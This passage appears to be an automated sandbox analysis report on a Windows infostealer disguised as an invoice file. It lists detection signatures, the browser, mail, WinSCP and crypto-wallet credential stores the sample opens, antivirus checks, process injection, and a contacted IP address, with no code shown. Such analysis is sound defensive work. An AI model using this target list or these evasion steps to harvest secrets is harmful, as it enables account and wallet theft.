Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Fattura-24SC-99245969925904728562.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\OSDescription.vbs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: InstallUtil.exe, 00000009.00000002.1450013749.00000000007C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Electrum@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectronCash@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Jaxx L4
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q7C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumLTC@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q4C:\Users\user\AppData\Roaming\Ethereum\keystore
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Exodus@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q@C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: Ethereum@\
Source: InstallUtil.exe, 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: q9C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: Fattura-24SC-99245969925904728562.vbs.exe, 00000007.00000002.1410025378.0000000007810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Yara detected Credential Stealer
Source: Yara match File source: 00000011.00000002.1617686351.00000000031E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452882158.000000000293F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1617686351.0000000003034000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452882158.0000000002607000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1617686351.0000000003324000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1452882158.00000000027C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Discord Token Stealer
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 7928, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 2980, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1546109 Sample: Fattura-24SC-99245969925904... Startdate: 31/10/2024 Architecture: WINDOWS Score: 100 51 90.168.9.0.in-addr.arpa 2->51 65 Malicious sample detected (through community Yara rule) 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 Yara detected Discord Token Stealer 2->69 71 7 other signatures 2->71 9 wscript.exe 1 2->9         started        12 wscript.exe 1 2->12         started        14 cmd.exe 2 2->14         started        signatures3 process4 file5 81 Malicious encrypted Powershell command line found 9->81 83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->83 85 Creates processes via WMI 9->85 17 Fattura-24SC-99245969925904728562.vbs.exe 18 9->17         started        21 wscript.exe 1 12->21         started        49 Fattura-24SC-99245...25904728562.vbs.exe, PE32 14->49 dropped 23 conhost.exe 14->23         started        signatures6 process7 file8 43 C:\Users\user\AppData\...\OSDescription.vbs, ASCII 17->43 dropped 45 C:\Users\user\AppData\...\OSDescription.vbs, ASCII 17->45 dropped 55 Found many strings related to Crypto-Wallets (likely being stolen) 17->55 57 Drops VBS files to the startup folder 17->57 59 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->59 63 5 other signatures 17->63 25 InstallUtil.exe 3 17->25         started        29 conhost.exe 17->29         started        61 Malicious encrypted Powershell command line found 21->61 31 OSDescription.vbs.exe 21->31         started        33 cmd.exe 21->33         started        signatures9 process10 dnsIp11 53 185.36.141.107, 49706, 49729, 49793 AS-DBNETZDE European Union 25->53 87 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->87 89 Tries to steal Mail credentials (via file / registry access) 25->89 91 Found many strings related to Crypto-Wallets (likely being stolen) 25->91 93 Tries to harvest and steal Bitcoin Wallet information 25->93 95 Writes to foreign memory regions 31->95 97 Powershell is started from unusual location (likely to bypass HIPS) 31->97 99 Injects a PE file into a foreign processes 31->99 101 2 other signatures 31->101 36 InstallUtil.exe 31->36         started        39 conhost.exe 31->39         started        47 C:\Users\user\...\OSDescription.vbs.exe, PE32 33->47 dropped 41 conhost.exe 33->41         started        file12 signatures13 process14 signatures15 73 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 36->73 75 Tries to steal Mail credentials (via file / registry access) 36->75 77 Tries to harvest and steal browser information (history, passwords, etc) 36->77 79 Tries to harvest and steal Bitcoin Wallet information 36->79
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.36.141.107
 unknown European Union
35368 AS-DBNETZDE false

Contacted Domains

Name IP Active
90.168.9.0.in-addr.arpa unknown unknown